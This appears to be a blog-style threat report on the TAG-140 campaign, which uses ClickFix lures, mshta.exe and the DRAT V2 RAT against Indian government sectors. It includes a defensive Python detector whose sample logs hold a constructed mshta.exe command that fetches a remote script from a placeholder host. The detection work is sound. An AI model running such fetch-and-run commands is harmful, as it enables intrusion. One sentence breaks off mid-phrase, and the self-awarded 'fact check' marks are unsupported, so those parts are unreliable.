Cyber Threat Landscape: An Urgent Global Concern
The cybersecurity battlefield continues to expand, especially across politically tense regions such as South Asia. A new wave of advanced cyberattacks has emerged, with Indian government entities being the latest targets of a sophisticated threat actor campaign dubbed TAG-140. This campaign, recently documented by researchers from Recorded Future’s Insikt Group, signals not just another attack, but an evolution in remote access tools and the strategic targeting methods used by state-aligned cyber adversaries. The attack overlaps with behaviors linked to SideCopy—an affiliate of Transparent Tribe, a known Pakistani APT group. This article dives into the critical components of the campaign, the tools used, and the broader implications for cybersecurity defenses worldwide.
TAG-140: The Campaign
A threat actor known as TAG-140, believed to be aligned with Pakistani intelligence interests, has launched a targeted campaign against Indian government sectors using a customized version of the DRAT remote access trojan (RAT). The attack methodology bears resemblance to tactics employed by SideCopy, a subgroup under the umbrella of Transparent Tribe, a Pakistani APT entity.
The campaign leveraged a ClickFix-style lure, where victims were tricked into executing a malicious script via mshta.exe. This triggered the BroaderAspect .NET loader, which then deployed DRAT V2, a new and more capable Delphi-compiled RAT. The infection path was likely initiated via spear-phishing emails, although the precise delivery mechanism has yet to be confirmed.
The malicious infrastructure mimicked a legitimate Indian Ministry of Defense press release portal, exploiting trust and familiarity to gain access. Unlike previous operations that focused solely on defense and academic sectors, this campaign expanded into domains like railways, oil & gas, and external affairs ministries.
DRAT V2 signifies a strategic upgrade in capabilities, supporting a custom TCP-based, server-initiated C2 protocol, and introducing enhanced flexibility in post-exploitation. TAG-140’s arsenal includes other malware families like CurlBack, SparkRAT, AresRAT, Xeno RAT, AllaKore, and ReverseRAT, emphasizing their operational adaptability.
Despite DRAT V2’s upgrade, it still employs basic persistence techniques, making it vulnerable to static and behavioral detection. Once embedded, the RAT can exfiltrate data, upload new payloads, and perform system reconnaissance, all while maintaining persistence. Researchers recommend monitoring loader reuse, spear-phishing infrastructure, and behavioral cues rather than focusing solely on malware signatures for effective threat detection.
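The behavioral cue the researchers point at is easy to hunt for at the first step of the chain: mshta.exe being handed a remote script, and mshta.exe then spawning a second-stage process. The detector below is an added example written for this article, not code from Recorded Future or from the article's sources; the log events, the field names (pid, ppid, image, parent_image, cmdline) and every path and host in them are constructed for the demo, and a real deployment would feed it Sysmon or EDR process-creation telemetry with those fields mapped.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style, simplified).
# Every value below, including the host name, is made up for this example.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3800, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe https://press-release.example.invalid/notice.hta"},
    {"pid": 4150, "ppid": 4120, "image": r"C:\Users\Public\stage2.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"stage2.exe"},
    {"pid": 2200, "ppid": 1300, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Vendor\Installer.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"pid": 2500, "ppid": 900, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

# A URL scheme or a UNC path anywhere in the command line counts as "remote".
REMOTE_ARG = re.compile(r"\b(?:https?|ftp)://|\\\\[^\\]+\\", re.IGNORECASE)


def is_mshta(image: str) -> bool:
    """True when the image path's file name is mshta.exe (case-insensitive)."""
    return image.lower().rsplit("\\", 1)[-1] == "mshta.exe"


def detect(events):
    """Return (pid, reason) findings for the two mshta.exe behaviours.

    Rule 1: mshta.exe started with a remote script argument, the
            ClickFix-style execution step described in the article.
    Rule 2: any process whose parent is mshta.exe, i.e. the HTA host
            launching a second-stage loader.
    A local .hta run by an installer (event 2200) matches neither rule.
    """
    findings = []
    for ev in events:
        if is_mshta(ev["image"]) and REMOTE_ARG.search(ev["cmdline"]):
            findings.append((ev["pid"], "mshta.exe launched with remote script argument"))
        if is_mshta(ev["parent_image"]):
            findings.append((ev["pid"], "child process spawned by mshta.exe"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

Both rules key on process lineage and arguments rather than on a file hash, so they keep firing when the loader is recompiled or the RAT is swapped for another family from the same toolkit.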
What Undercode Says:
TAG-140’s latest campaign represents a textbook example of modern cyber warfare tactics, particularly in geopolitically charged regions. What sets this attack apart isn’t just the sophistication of the tools used, but the strategic targeting of multiple sectors essential to national stability—defense, energy, diplomacy, and infrastructure.
This operation reflects the growing complexity of state-aligned APT groups. Rather than relying on high-tech zero-days, they are mastering social engineering and persistence to quietly infiltrate and remain undetected in critical systems. The use of spear-phishing lures disguised as press portals is an old tactic, but its continued effectiveness underlines the need for more robust employee awareness training and email threat protection.
From a technical standpoint, the evolution from .NET-based DRAT to a Delphi-compiled version shows how threat actors are adjusting to static detection methods, possibly attempting to bypass signature-based AV engines and improve portability. The inclusion of a custom TCP-based, server-initiated C2 protocol gives them even more control over compromised environments, allowing real-time decision-making during reconnaissance or data exfiltration.
The presence of other malware families in their toolkit (such as SparkRAT and Xeno RAT) also suggests that TAG-140 is operating with a modular, scalable infrastructure—capable of shifting tactics rapidly based on mission objectives or target defenses.
However, it’s important to note that the
Strategically, this campaign underscores how nation-state cyber programs are broadening their scope, targeting not only military but also civilian infrastructure. The blending of operational espionage with cyber sabotage could be the next phase. Hence, governments and enterprises alike must pivot toward threat behavior-based detection frameworks and invest in cyber threat intelligence partnerships to stay ahead.
Ultimately, TAG-140 is not just a threat to India but a signal to the global cybersecurity community: the borders of cyber conflict are expanding, and traditional defenses are no longer enough. We must evolve as rapidly as the attackers.
🔍 Fact Checker Results
✅ TAG-140 is aligned with SideCopy, which has established links to Pakistani APT operations.
✅ DRAT V2 uses Delphi, marking a shift from earlier .NET implementations.
✅ Initial infection involves mshta.exe and BroaderAspect loader, a method seen in prior campaigns by the group.
📊 Prediction
Expect TAG-140 and similar APT groups to further target regional power structures, including transportation and energy sectors across South Asia and possibly Southeast Asia. As detection methods evolve, threat actors will likely adopt more polymorphic malware and dynamic C2 channels, forcing cybersecurity teams to shift from signature-based defense to real-time behavioral analytics. With escalating tensions in the region, cyberattacks will increasingly be used as soft-power weapons in hybrid warfare scenarios.
References:
Reported By: www.darkreading.com